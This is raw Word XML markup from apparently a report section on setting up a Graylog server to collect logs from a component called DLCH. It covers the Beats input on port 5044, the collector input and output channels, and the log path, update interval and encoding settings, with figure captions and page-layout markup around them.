    <w:p w:rsidR="00D907E1" w:rsidRPr="00BA1B83" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F73B87" w:rsidRDefault="00F73B87">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EA71C0" w:rsidRDefault="00C92C7D" w:rsidP="00EA71C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>We implement Graylog Server as CLSS for storing log sent from DLCH. Graylog virtual machine image can be downloaded from the official site. After installing Graylog image, we configure it to work with Graylog Collector Sidecar in DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00F73B87" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To receive incoming log data from DLCH, we create a log input which use Beats as the </w:t>
      </w:r>
      <w:r w:rsidR="00280207">
        <w:t>framework. We set the binding address to local, which is 0.0.0.0 and port to 5044.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444219C5" wp14:editId="216C8CF8">
            <wp:extent cx="5581650" cy="4681220"/>
            <wp:effectExtent l="19050" t="19050" r="1905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1650" cy="4681220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="317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oftEdge rad="0"/>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRPr="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create an input for Graylog server using Beats framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This input creates a channel for Graylog to receive log data from DLCH via Filebeats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4742" w:rsidRDefault="00280207" w:rsidP="00BF4742">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="399F09EC" wp14:editId="799D7BFB">
            <wp:extent cx="5581650" cy="2794635"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="247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1650" cy="2794635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="317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rsidR="00280207" w:rsidRPr="00BF4742" w:rsidRDefault="00BF4742" w:rsidP="00BF4742">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog</w:t>
      </w:r>
      <w:r w:rsidR="00FA24D9">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel for receiving data from DLCH via Filebeats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00E53574" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To display the log in dashboard, Graylog server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> be configured an output channel which used the input described above. For</w:t>
      </w:r>
      <w:r w:rsidR="00200338">
        <w:t xml:space="preserve"> each collector connect to Graylog server, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00200338">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00200338">
        <w:t xml:space="preserve"> indicate 2 channels for its functionalities: an input channel and an output channel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3377E2F0" wp14:editId="1C0B6BDD">
            <wp:extent cx="5581650" cy="3209925"/>
            <wp:effectExtent l="19050" t="19050" r="1905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1650" cy="3209925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="317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rsidR="00E53574" w:rsidRPr="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure input and output channel for each</w:t>
      </w:r>
      <w:r w:rsidR="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLCH’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> collector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Configure the Input Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190ACB05" wp14:editId="1430A9D7">
            <wp:extent cx="5553075" cy="7591425"/>
            <wp:effectExtent l="19050" t="19050" r="28575"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53075" cy="7591425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="317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rsidR="00200338" w:rsidRPr="00AF7236" w:rsidRDefault="00200338" w:rsidP="00AF7236">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AF7236" w:rsidRPr="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Input channel for DLCH’s collector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the Output Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00200338" w:rsidP="00A94909">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA7A322" wp14:editId="732A188E">
            <wp:extent cx="5581650" cy="3117850"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="25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1650" cy="3117850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="317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rsidR="00200338" w:rsidRDefault="00A94909" w:rsidP="00A94909">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94909">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A94909">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Output channel for DLCH’s collector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00A94909" w:rsidP="00A94909">
      <w:r>
        <w:t xml:space="preserve">We create an Output channel for each DLCH’s collector, then we create the Input channel which forwards log data to the output channel. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00A94909" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The log path for collecting is set to “/home/hungio/APTLogs/*.log” which indicates that Graylog Collector Sidecar will read into the directory name “APTLogs” and read all the file with the extension is “.log”. “APTLogs” is also the directory where DLCH stores the log files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The update interval is set to 5 seconds which indicates Graylog Collector to read the files every 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The encoding format is set to “utf-8” indicating that the log files to be read use utf-8 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00C425FC" w:rsidP="00C425FC"/>
    <w:p w:rsidR="00A94909" w:rsidRPr="00A94909" w:rsidRDefault="00A94909" w:rsidP="00A94909"/>
    <w:sectPr w:rsidR="00A94909" w:rsidRPr="00A94909" w:rsidSect="000C0B89">
      <w:footerReference w:type="default" r:id="rId55"/>
      <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
      <w:pgMar w:top="1588" w:right="1134" w:bottom="187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2A19" w:rsidRDefault="00B42A19" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B42A19" w:rsidRDefault="00B42A19" w:rsidP="000C0B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5B0F" w:rsidRDefault="00345B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7388033"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
      <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0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5B0F" w:rsidRDefault="00345B0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0022209"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="wps">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D81B01" wp14:editId="6790FCA5">
                  <wp:extent cx="5467350" cy="45085"/>
                  <wp:effectExtent l="0" t="9525" r="0" b="2540"/>
                  <wp:docPr id="7" name="Flowchart: Decision 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FB9DAB9" id="_x0000_t110" coordsize="21600,21600" o:spt="110" path="m10800,l,10800,10800,21600,21600,10800xe">
                  <v:stroke joinstyle="miter"/>
                  <v:path gradientshapeok="t" o:connecttype="rect" textboxrect="5400,5400,16200,16200"/>
                </v:shapetype>
                <v:shape id="Flowchart: Decision 7"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" fillcolor="black" stroked="f">
                  <v:fill r:id="rId1" o:title="" type="pattern"/>
                  <w10:anchorlock/>
                </v:shape>
              </w:pict>
            </mc:Fallback>
          </mc:AlternateContent>
        </w:r>
      </w:p>
      <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B0F">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE    \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00087128">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>71</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="00345B0F" w:rsidRDefault="00345B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2A19" w:rsidRDefault="00B42A19" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B42A19" w:rsidRDefault="00B42A19" w:rsidP="000C0B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5B0F" w:rsidRDefault="00345B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5B0F" w:rsidRDefault="00345B0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5B0F" w:rsidRDefault="00345B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E4216"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAC0853A"/>
    <w:lvl w:ilvl="0" w:tplc="4B4616A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61118B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA30211A"/>
    <w:lvl w:ilvl="0" w:tplc="81F899F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8C871EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFFCA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560A0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D28825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4400E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D24BA0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Chapter %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E46139F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99944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385BA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07080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69297D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18362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044A13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F680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25322B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E57C5F76"/>
